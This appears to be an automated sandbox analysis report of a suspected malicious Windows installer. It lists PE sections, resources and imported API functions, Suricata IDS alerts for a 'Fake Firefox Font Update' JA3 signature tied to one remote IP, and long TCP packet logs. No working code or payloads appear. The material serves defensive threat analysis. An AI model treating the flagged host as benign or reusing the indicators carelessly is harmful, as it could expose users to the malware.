                                                                                                                                                                .data0x9c0000x17900xa000d375a46a1b65b20341c234446129bcfFalse0.18828125firmware 2005 v9319 (revision 0) \277E V2, 0 bytes or less, at 0 0 bytes , at 0 0 bytes 2.357689911760452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .didat0x9e0000xcc0x20000535babd2373dd0ad324ceba5e2fc7bFalse0.263671875data1.7948113869126585IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .wixburn0x9f0000x300x200ab5f7325b234bacb71b5d58f9a9ff40eFalse0.10546875data0.5556939563611969IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0xa00000x4efc0x500066e987baf579d3084984000d74768671False0.3189453125data5.418748157498877IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .reloc0xa50000x5f680x6000bf2489eda548104ef6d2ce4e15cf676fFalse0.7933349609375data6.795414107251252IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                Resources

                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_ICON0xa01c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.43185920577617326
                                                                                                                                                                RT_RCDATA0xa0a680x8dataEnglishUnited States1.75
                                                                                                                                                                RT_MESSAGETABLE0xa0a700x3d74dataEnglishUnited States0.282418001525553
                                                                                                                                                                RT_GROUP_ICON0xa47e40x14dataEnglishUnited States1.15
                                                                                                                                                                RT_VERSION0xa47f80x2c8dataEnglishUnited States0.4705056179775281
                                                                                                                                                                RT_MANIFEST0xa4ac00x43cXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1081), with no line terminatorsEnglishUnited States0.5027675276752768

                                                                                                                                                                Imports

                                                                                                                                                                DLLImport
                                                                                                                                                                KERNEL32.dllGetUserDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, CreateProcessW, DuplicateHandle, FreeLibrary, ProcessIdToSessionId, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, OpenProcess, GetProcessId, SetProcessShutdownParameters, LocalFileTimeToFileTime, SetEndOfFile, SetFileTime, GetExitCodeThread, DosDateTimeToFileTime, CompareStringA, SetThreadExecutionState, ReleaseSemaphore, CreateMutexW, GetExitCodeProcess, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, GetStdHandle, ExitProcess, GetModuleHandleExW, VerifyVersionInfoW, GetFileType, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileSizeEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, WriteConsoleW, GetComputerNameW, GetSystemTime, VerSetConditionMask, CompareStringW, GetNativeSystemInfo, CreateThread, GetCurrentProcess, CreateSemaphoreW, CreateEventW, ReleaseMutex, ResetEvent, SetEvent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, MoveFileExW, SetFileAttributesW, RemoveDirectoryW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, GetCurrentDirectoryW, ExpandEnvironmentStringsW, GetProcessHeap, HeapSize, HeapFree, GetDateFormatW, HeapReAlloc, HeapAlloc, GetModuleFileNameW, GetSystemWow64DirectoryW, GetSystemDirectoryW, GetLocalTime, Sleep, SetLastError, GetTempPathW, GetVolumePathNameW, GetTempFileNameW, GetFullPathNameW, CreateDirectoryW, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, FormatMessageW, LocalFree, LoadLibraryExW, GetProcAddress, GetModuleHandleW, WaitForMultipleObjects, WaitForSingleObject, HeapSetInformation, GetLastError, lstrlenA, GetCurrentProcessId, GetModuleHandleA, MulDiv, CompareStringOrdinal, GetSystemWindowsDirectoryW, GlobalAlloc, GlobalFree, CopyFileW, LoadResource, LockResource, SizeofResource, FindResourceExA, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, GetTimeZoneInformation, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, WriteFile, SetFilePointer, CreateFileA, CloseHandle, CreateFileW
                                                                                                                                                                USER32.dllReleaseDC, MonitorFromPoint, MonitorFromWindow, GetDC, GetMonitorInfoW, ShowWindow, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, SetWindowPos, CreateWindowExW, UnregisterClassW, RegisterClassW, PostQuitMessage, DefWindowProcW, DispatchMessageW, TranslateMessage, GetMessageW, WaitForInputIdle, IsWindow, PostMessageW
                                                                                                                                                                GDI32.dllSelectObject, StretchBlt, GetObjectW, DeleteObject, DeleteDC, GetDeviceCaps, CreateCompatibleDC, CreateDCW
                                                                                                                                                                ADVAPI32.dllCryptHashData, CryptDestroyHash, CryptReleaseContext, OpenProcessToken, AllocateAndInitializeSid, CheckTokenMembership, GetTokenInformation, AdjustTokenPrivileges, IsWellKnownSid, LookupPrivilegeValueW, CryptCreateHash, RegCreateKeyExW, RegDeleteKeyW, RegEnumKeyExW, RegEnumValueW, RegSetValueExW, CryptGetHashParam, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, ChangeServiceConfigW, SetEntriesInAclW, DecryptFileW, InitializeAcl, CreateWellKnownSid, ConvertStringSecurityDescriptorToSecurityDescriptorW, ReportEventW, OpenEventLogW, CloseEventLog, RegQueryInfoKeyW, RegDeleteValueW, RegQueryValueExW, GetUserNameW, InitiateSystemShutdownExW, RegOpenKeyExW, RegCloseKey, QueryServiceConfigW, SetNamedSecurityInfoW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetEntriesInAclA, CryptAcquireContextW
                                                                                                                                                                ole32.dllCoInitializeEx, CoInitialize, CoInitializeSecurity, CoUninitialize, CLSIDFromProgID, CoTaskMemFree, StringFromGUID2, CoCreateInstance
                                                                                                                                                                OLEAUT32.dllVariantInit, SysAllocString, VariantClear, SysFreeString
                                                                                                                                                                RPCRT4.dllUuidCreate
                                                                                                                                                                SHELL32.dllSHGetFolderPathW, CommandLineToArgvW, ShellExecuteExW

                                                                                                                                                                Possible Origin

                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States

                                                                                                                                                                Network Behavior

                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2025-01-09T14:42:21.593732+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749973104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:22.982174+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749974104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:23.774733+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749975104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:40.385432+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750061104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:41.480461+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750065104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:56.274932+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750084104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:57.838141+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750085104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:58.805925+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750086104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:42:59.719074+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750087104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:00.973940+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750088104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:02.883336+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750089104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:04.240842+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750090104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:09.026281+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750091104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:10.054240+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750092104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:10.982316+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750093104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:11.774366+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750094104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:12.607238+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750095104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:13.524132+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750096104.21.80.52443TCP
                                                                                                                                                                2025-01-09T14:43:14.504321+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.750097104.21.80.52443TCP

                                                                                                                                                                Network Port Distribution

                                                                                                                                                                TCP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jan 9, 2025 14:41:05.323810101 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:05.325380087 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:05.448788881 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:10.558703899 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:10.933218002 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:11.683279037 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:13.183293104 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:14.933238029 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:14.933280945 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:15.058207989 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:16.167710066 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:17.498220921 CET44349699104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:41:17.498327017 CET49699443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:22.120771885 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:34.027144909 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                Jan 9, 2025 14:41:55.332781076 CET49699443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.339093924 CET44349699104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:41:55.371767044 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.371819973 CET44349938104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:41:55.371893883 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.382292986 CET49938443192.168.2.7104.98.116.138
                                                                                                                                                                Jan 9, 2025 14:41:55.382311106 CET44349938104.98.116.138192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.075448036 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.075490952 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.075628042 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.085000038 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.085020065 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.593650103 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.593732119 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.595458984 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.595474005 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.595743895 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:21.636703968 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.714529037 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.714626074 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:21.714632034 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277318001 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277376890 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277406931 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277431011 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277455091 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277489901 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.277508020 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277529955 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.277925014 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.277932882 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.277942896 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.278062105 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.278072119 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.281999111 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.282018900 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.282195091 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.282208920 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.282259941 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.362040043 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369249105 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369276047 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369297981 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369366884 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369366884 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369381905 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369590998 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369659901 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369684935 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369709015 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369725943 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369731903 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.369800091 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.369801044 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.370541096 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370598078 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370624065 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370645046 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.370816946 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.370816946 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.370827913 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371536970 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371573925 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371597052 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371619940 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371640921 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371651888 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.371653080 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.371670008 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.371690989 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.417882919 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.417907953 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.446392059 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.446489096 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.446517944 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461595058 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461627007 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461846113 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.461859941 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.461889982 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462028980 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462035894 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462115049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462367058 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462373972 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462589979 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462625980 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462657928 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462748051 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.462887049 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.463021994 CET49973443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.463042974 CET44349973104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.513715982 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.513751030 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.513820887 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.514115095 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.514127016 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.982094049 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.982173920 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.983632088 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.983638048 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.984020948 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:22.984781981 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.984807968 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:22.984813929 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282088995 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282224894 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282289028 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.282525063 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.282541990 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.282558918 CET49974443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.282563925 CET44349974104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.312052011 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.312088966 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.312386990 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.312527895 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.312535048 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.774386883 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.774733067 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.776938915 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.776962042 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.777348995 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:23.778431892 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.778431892 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:23.778460026 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:24.097856045 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:24.098021984 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:24.098114014 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:24.099494934 CET49975443192.168.2.7104.21.80.52
                                                                                                                                                                Jan 9, 2025 14:42:24.099515915 CET44349975104.21.80.52192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:33.635123014 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:33.635143995 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:33.635201931 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:33.635529041 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:33.635545969 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:34.357589006 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:34.386104107 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:34.386116028 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:34.387223959 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:34.387289047 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:34.389517069 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:34.389585018 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:34.441242933 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:34.441271067 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:34.544322014 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:35.684722900 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:35.684791088 CET4435000018.244.18.38192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.684853077 CET50000443192.168.2.718.244.18.38
                                                                                                                                                                Jan 9, 2025 14:42:35.774348974 CET50011443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:35.774413109 CET44350011162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.774555922 CET50011443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:35.774797916 CET50011443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:35.774827003 CET44350011162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.776016951 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:35.776041985 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.776859999 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:35.777015924 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:35.777045012 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.783756971 CET50013443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:35.783791065 CET44350013162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:35.783849001 CET50013443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:35.784416914 CET50013443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:35.784431934 CET44350013162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.234764099 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.235228062 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.235251904 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.236306906 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.236382008 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.237700939 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.237768888 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.237879992 CET50012443192.168.2.7172.64.41.3
                                                                                                                                                                Jan 9, 2025 14:42:36.237889051 CET44350012172.64.41.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.239586115 CET44350013162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.239886999 CET50013443192.168.2.7162.159.61.3
                                                                                                                                                                Jan 9, 2025 14:42:36.239909887 CET44350013162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.240948915 CET44350013162.159.61.3192.168.2.7
                                                                                                                                                                Jan 9, 2025 14:42:36.241014957 CET50013443192.168.2.7162.159.61.3
